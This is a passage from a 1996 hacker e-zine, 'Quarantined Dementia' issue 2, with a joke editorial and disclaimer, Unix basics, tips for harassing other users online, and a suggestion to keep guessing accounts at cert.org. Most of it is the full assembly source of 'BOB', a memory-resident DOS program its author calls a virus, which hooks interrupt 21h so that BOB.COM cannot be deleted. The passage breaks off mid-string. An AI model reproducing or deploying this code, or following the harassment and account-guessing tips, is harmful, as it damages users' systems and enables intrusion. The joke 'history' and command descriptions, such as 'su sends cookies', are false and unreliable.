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quarantined dementia issue number 2 spring 1996 "My life sucks. I am pathetic, and I thought I'd bitch about it in a poem. You don't understand me, You can NEVER understand ME. You are a filthy uneducated pig. Always attempting to understand, but never actually doing it. To hell with you, let me be alone. My life sucks." - Anonymous QD Leader QD is back and better than ever. (Notice better is relative) We're slapin' some new improved bull shit straight in your direction. Some people may wonder what QD is about and why the hell the contributors don't have lives. The answer is simple- we don't know either. So instead of wasting our time doing nothing, we waste your time writing stuff that you will read. Yes, reading is not an option. You have to read this. Human curiosity will not let you not read this. For example- There might be something you want to read somewhere in this QD magazine. If you don't read it you will never know. But since you now have a copy of QD (you are reading this, right?) you have the ability to find anything you might want to read. Just think, somewhere deep inside this text you might stumble upon a piece of information that you wanted to know, but didn't know it. If that doesn't make you want to read this, then don't. Be warned if you don't though, because if not, you could very posibly not be a human. And if that's the case, the QD staff doesn't WANT you to read this. In fact, all aliens on this planet can go back to where they came from and stop bothering us. We don't like you guys! Don't experiment with us! Don't fly your saucers in our nice skies! Don't use my dogs brain waves for fuel! If you guys were nice aliens you wouldn't do that stuff! Stop it! ANYWAYS.. Welcome to QD #2.. (BTW, please don't discorporate while reading this.. We have had several complaints from the feds on this topic.. (ie- discorporate about an hour afterwards so they can't connect it with us..) We'd really appreciate it.. thanks..) -destacona (dest.acona@net-link.com) Send any submissions to the previous address (and then you too can be a member!) NOTE: They cannot be anonymous! member list /\ |/\| editor - destacona |/\| leader - quasimodo |/\| -"what the hell is members - aFterthought |/\| that?" danneskjold /|/\|\ dante |_|__|_| ingenitor /||\ anon |.--.| / -||- \ figure one ----------------------------------------------------------------------------- - Quarantined Dementia issue 2 - The zine not afraid to use the word "existential." index i. Disclaimer - Some QD people 1. History of the Internet - Anon 2. BOB! A very happy resident virus - Ingenitor 3. Social Engineering Techniques - Anon 4. "Computer Class" - Anon 5. Ten steps to take over the world - Ingenitor 6. A Glimpse of a Hacker - Ingenitor 7. Warez Kiddiez - Anon 8. Some random shit - Yossarian & Afterthought 9. Elite ways to get Coke - Destacona 10. Quarantined Dementia Faq - QD Staff 11. The Elite QD rap - Anon AGAIN -- QURANTINED DEMENTA IS NOT SPEEL CHECKED IN ANYWAY. BELEIVE IT. -- ----------------------------------------------------------------------------- Disclaimer Things described in this magazine are in no way useful or are in no way to be used as a useful source of information. QD is a magazine about nothing or something, maybe. Sometimes there are useful things that can be gleamed from this magazine, if so, use them wisely. All postings about virii or similar programs are to be used as is and may not be distributed in normal ways. (This should not be a problem.) Also any use of virii or similar programs recorded in this issue of QD are not the responsiblity of the QD staff or and members affiliated with QD at the specified release data. Any modifications or additions are welcomed and should be sent to us immediately, it is your one duty to this magazine. You may read and distribute this copy of QD2 as long as you follow these simple guidelines: 1) After 30 days if you do not like the magazine it will become angry and format your harddrive. 2) After 30 days if you do like the magazine it may flare up anyways and format your harddrive. 3) Do not modify or corrupt or allow an incomplete transmission of our magazine; otherwise bad things may or may not occur. 4) Upon recieving this issue of QD, you have to read the disclaimer and understand it completly before engaging yourself into reading this magazine. 5) If you decide to distribute this magazine no money or barter or trade of any kind will be tolerated. The only amount of compensation that is allowable is $5.00 or less for a disk, or shipping, or CD, or charity, or donnatation, or one's school or college fund. 6) Whatever you do, be proud of yourself for you have become a valued member of a team of people helping out a team of writers with too much time on their hands. Upon receiving info that you liked our magazine, future releases may or may not be sent to you. This may or may not be our way of appreciating your enjoyment of our magazine. The members or QD are hereby not responsible for any damage or lose of your information, data, disk drives, sex life, hard drive, tape backup, keyboard, alarm clock, disk(ettes), or any hardware or software appliance that might be in, near, or around your computer. The members of QD are also not responsible for your computer either! If this magazine screws up or fowls up your computer in any way, the members of QD are not responsible for hours of technical phone calls and/or expenses due to phone calls. The members of QD are also not responsible for any damage to any periphial connected in or around your computer. The members of QD are also not responsible for you buying a Mac or some other operatating system and cannot read this magazine. The members of QD are also not responsible for any tears shed on the keyboard and/or sudden electricution or fire that could occur after tears hitting expensive or explosive hardware/software. And futhermore, the members of QD are not responsible, the members of QD repeat, not responsible. QD Staff Thank you, and enjoy our magazine. FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU SHIT ON YOU FUCK YOU DAMMIT! ----------------------------------------------------------------------------- HISTORY OF INTERNET The internet was programmed by Bill Gates in late 1984. It is contained on a huge computer somewhere in Colorado. All of the local phone numbers you call connect via bouncing the laser signals off the moon to the computer in Colorado. To confuse all the DOS users, Internet's OS is something called UNIX. LOGGING ON THRU UTK 1). Type 'c duncan' Provided you have an account, you are then on the internet. 2). Type 'c telnet' After you do this, you can say 'open duncan.utk.edu'. Then you will be logged onto Duncan. Once again, you need an account. Also, you must supply the IP address to get to non-local servers. 3). Type 'c library' This will connect you to the WWW. Unfortuneately, UTK has recently removed the 'G' option which would enable you to get to any site. However, there are still ways. If you are just looking for a WWW page, you can still access those using the search engines. Also, you may search for 'VERONICA'. Once there, you can search gopher space for 'Telnet Resources', once you get the results (you'll have to keep trying until you get through), go into one of the DIRs labeled 'Telnet Resources' and look for the 'Open Telnet' option. From there, it should be obvious. [editors note: This is slower than all the busses in the world combined.] BASIC UNIX COMMANDS ls List files in current directory -l option will list all info on the files -a option will list all hidden files rm Removes a file -r option will delete all files in all sub directories. (kinda like DOS's deltree) mkdir Makes a DIR rmdir Removes a DIR who Lists who is online cat Displays a file ypcat Another way to display files, ;) more Lists files with a pause write Writes a message to another user online chmod Changes the mode of a file o=other u=owner g=group x=executable r=read w=write Examples: chmod a+w <file> (gives all people write privs) chmod a-r <file> (takes away read privs from all) ps Lists processes -u option allows you to look at user's processes -l option lists 'long' info -f option lists 'full' info kill Kills a process -9 <PID> option will kill the process immediately pwd Lists your location passwd Change your passwd env Lists your environment variables su Sends cookies thru your phone line. Great fun. Do it often. rlogin Lets you log onto other computers specified in your /.rhosts telnet Opens a Telnet session ncftp Opens a ftp connection, a little more convenient than normal FTP open <site> Will open a site get <file> Will get the specified file mget <wildcard> Will get all the specified files (mget *.* will get EVERY file) 'cd' will change DIRs 'ls' will list files 'more' will let you read a text file irc Connect to Internet Relay Chat. YAY! lynx Connect to the WWW WAYS TO PISS OFF OTHER USERS ONLINE Well...every once in awhile you want to piss someone off. This can be fun and very productive. ;) write <username> <message> This will let you write messages to other users. banner <message> | write <user> Will display <message> in HUGE letters on <user>'s screen. This is also annoying. cat <binaryfile> | write <user> Will display a binary file on THEIR screen. This is very annoying, as you can imagine. Some Cool Sites To Explore -------------------------- http://www.happypuppy.com - really cool shareware games and stuff. http://www-personal.engin.umich.edu/~jgotts/underground.html-INET underground ftp.cdrom.com ftp.fc.net ftp.leo.org ftp.giga.or.at http://www.lycos.com - Web Searcher http://www.yahoo.com - Another Web Searcher cert.org - Just keep trying accounts, they won't mind http://metacrawler.cs.washington.edu:8080 DISCLAIMER- QD does not take responsibility for any usage of the information in this article. Blah blah blah. Also, QD does not take credit for any info in this article. ----------------------------------------------------------------------------- -= BOB! A very happy resident virus =- May not be anything new, but this little guy has some fun with dos. Actually it screws dos into thinking that anything named BOB.COM is really named BAB.COM. When bob takes it's grip it doesn't let go. In other words, you can't delete bob! YES! Hail BOB. BOB ro0lz. BOB will not relent! (Sorry, I gets carried away sometimes) Well here is the source to BOB, long live BOB. -- [Release Two, Version 1.01�] .286 _TEXT segment para public use16 'CODE' assume ds:_TEXT, cs:_TEXT org 100h bob_start: jmp begin ;hey,this be the beginning or is it the ;end. I don't know, stop talking! _stack db 32 dup(?) ;arrrghhhh? what the hell! _old_21h_seg dw ? ;place to save the old seg to jmp l8r _old_21h_ofs dw ? ;place to save the old ofs to jmp l8r _terminate db 0CDh, 020h ;ohho haha HAHA HEHE HEHEheheheha, etc. ;um... sorry, no real reason here. _bob_str db 0, 'bob.com', 0 ;even when backwards, bob is still ;bob. no real reason here either. _clear db ? ;A little Clear Flag, cool eh? new_int_21h: cmp ah, 041h ;hey, someone tried to git rid of me je bob_cant_go ;no, bob CAN'T go, hehehehe, uuggghh! cmp ax, 0CABBh ;is we here yet, si senor je stupid_reqst ;yep senor, we here jmp say_byte_me ;byte me (or go to dos) stupid_reqst: cmp bx, 0BAABh ;wow, little too close,had to make sure je say_bye ;we were here, just little redunantcy jmp say_byte_me ;byte me again (no darnit, go to dos) say_bye: mov bx, 0100h say_byte_me: push cs:[_old_21h_seg] ;getting pushy aren't we push cs:[_old_21h_ofs] retf ;cya sometime around dos bob_cant_go: pushf ;getting pushy again, whoa! pusha push ax push bx push cx push dx push si push di push es push ds push bp mov ax, cs ;having fun with segments mov es, ax ;es has to be the same as cs lea di, cs:[_bob_str + 7] ;load bob at end of string mov si, dx ;dx is the place the asciiz name ;is put when dos is asked to delete ;a phile find_end: lodsb ;okay, find the end of the path or al, al ;check for zero jz found_end ;q. found? jmp find_end ;a. no, so jmp back to beginning found_end: mov al, ds:[si - 9] ;think hard, 'bob.com, 0' is 8 chars cmp al, '\' ;so the slash is at 9 right? (yes) ;even if the sent path contains a name ;longer than 'bob.com, 0', it ;will fail the slash test, and then ;it will be loaded to the beginning ;of the path_str, (ie 'c:\bc\today.com') ;by the time it hits the colon the test ;will fail and the path will be un- ;changed. (Wheuu!, didn't even take a ;breath!)... jne no_clr_slash ;q. slash found? xor al, al ;a. no, so fall thru mov ds:[si - 9], al ;make slash a zero dec si ;find the very last byte of the asciiz dec si ;past the zero (asciiZ) [think hard] std ;set the direction to count down mov al, 1 ;save the direction status mov cs:[_clear], al ;in var _clear jmp cleared_slash ;okay. we cleared the slash, jmp ;must have not been a slash to clear, so no_clr_slash: cld ;clear the dir flag xor al, al ;and store it in _clear mov cs:[_clear], al ;got it? lea di, cs:[_bob_str + 1] ;now load str after the leading zero mov si, dx ;and load path at beginning cleared_slash: xor ax, ax ;well the slash was or wasn't cleared mov bx, ax ;so start the unsigned compare mov cx, 617Ah ;61='A',7A='a' for compare next_char: lodsb ;get first or last byte depending on mov bl, es:[di] ;dir flag, get byte from bob_str too or al, al ;q. zero? jz icmp_end ;a. yep, so end scasb ;q. zero in es:[di] je next_char ;a. nope, so read in next char ; yep, so do the unsigned compare icmp_al_upr: cmp al, ch ;q. is below 'a' jb icmp_bl_upr ;a. yep so test bl cmp al, cl ;q. is above 'A' ja icmp_bl_upr ;a. yep so test bl sub al, 'a' - 'A' ;otherwise sub 32 to upper case it icmp_bl_upr: cmp bl, ch ;q. is below 'a' jb icmp_again ;a. yep so do compare when upper cased cmp bl, cl ;q. is above 'A' ja icmp_again ;a. yep so do compare when upeer cased sub bl, 'a' - 'A' ;otherwise sub 32 to upper case it icmp_again: cmp al, bl ;do upper cased compare je next_char ;is equal, find next char icmp_end: sub ax, bx ;do final unsigned subtract or ax, ax ;test ax jz change_bob ;q. is ax zero jmp pop_er ;a. yeah, so trash bob so you can't ; delete it. change_bob: mov al, cs:[_clear] ;test the clear flag or al, al jz clr_run ;q. is zero, modify when cld'd mov byte ptr ds:[si + 3], 'A' ;load the middle with 'A',so you mov byte ptr ds:[si + 1], '\' ;get bAb.com, then load a slash jmp pop_er ;where it was deleted earlier ;start restor'n vars clr_run: mov byte ptr ds:[si - 7], 'A' ;well, so there was not slash ;so we went forw'd and now we modify ;bob.com from where the slash would have ;been. (GOT it?) I thought so! pop_er: mov al, cs:[_clear] ;well since we had to clear the slash or al, al ;to even test the stupid string we have jz finish_int ;to clean up if necessary. (got it?) last_loop: lodsb ;well now a nasty situation has occured or al, al ;where the test has failed and the slash jz add_slash ;has been removed, so find the place by jmp last_loop ;searching for the zero that now takes ;its place and then put a slash there. add_slash: mov byte ptr ds:[si + 1], '\' finish_int: pop bp ;well, here we go again with pop'n. pop ds pop es pop di pop si pop dx pop cx pop bx pop ax popa popf jmp say_byte_me ;well, jmp back to the original dos int ;so it will find the bAb.com instead of ;bob.com, cool eh? begin: mov ax, cs ;the place where it all starts. mov ds, ax ;setup the data seg and the stack mov sp, offset _stack + size _stack mov ax, 0CABBh ;now do an installation check mov bx, 0BAABh ;to see if we are already here. int 21h cmp bx, 0100h ;q. is we been here already? je exuent_bob ;a. yep, exit bob ; nope, load bob... mov ax, 3521h ;dos cmd for getting vectors int 21h ;now screw dos over, find it's vectors. ;and save em (below). mov ds:[_old_21h_ofs], bx mov ds:[_old_21h_seg], es push ds ;save ds for l8r... mov ax, ds ;get the MCB by sub'n the original ds dec ax ;by one. mov ds, ax mov bx, ds:[3] ;get the size of my programs allocated ;memory. pop ds ;reload ds mov ax, cs ;put the codeseg into es mov es, ax ;where dos can find it mov ah, 4Ah ;dos func for setting mem block size sub bx, (offset begin - offset bob_start + 15) / 16 + 1 sub bx, 16 ;allocate sizeof bobcode and a PSP int 21h mov ah, 48h ;now allocate the memory mov bx, (offset begin - offset bob_start + 15) / 16 add bx, 16 ;calculate PSP and bobcode length int 21h ;now screw dos over dec ax ;now find MCB of newly allocated mov es, ax ;block o mem. mov byte ptr es:[1], 8 ;say i'm dosblock o mem now... hehehehe inc ax ;get original seg of new mem. mov es, ax mov si, offset bob_start ;load si with the beginning of bob mov di, 100h ;load di with the beginning of mem mov cx, (offset begin - offset bob_start) ;get length mov ax, cs ;cs=ds mov ds, ax cld ;setup to inc di & si rep movsb ;with blasting speed copy bob to himem. mov ax, es ;es=ds, so dos can find it mov ds, ax mov dx, offset new_int_21h ;the beginning of our happy bobcode mov ax, 2521h ;tell dos to pack up and move out int 21h ;good ole dos, it learnt a new trick ;screw dos and have fun! hehehehe mov ax, cs mov ds, ax mov ah, 9 ;load banner and display lea dx, _bob_load_msg int 21h jmp around_msg exuent_bob: mov ax, cs mov ds, ax mov ah, 9 ;give error msg about bob being already lea dx, _bob_here_msg ;loaded. int 21h around_msg: mov al, byte ptr cs:[_terminate] mov byte ptr cs:[100h], al ;load first byte with CDh mov al, byte ptr cs:[_terminate + 1] mov byte ptr cs:[101h], al ;load sec byte with 20h mov ax, cs ;now push cs and ax push ax mov ax, 0100h push ax retf ;convert cs:ax -> cs:ip (cool eh?) _bob_load_msg db 'BOB v1.01� delete sentry virus loaded into high memory', 0Dh, 0Ah db 'Fashioned by Ingenitor!', 0Dh, 0Ah, '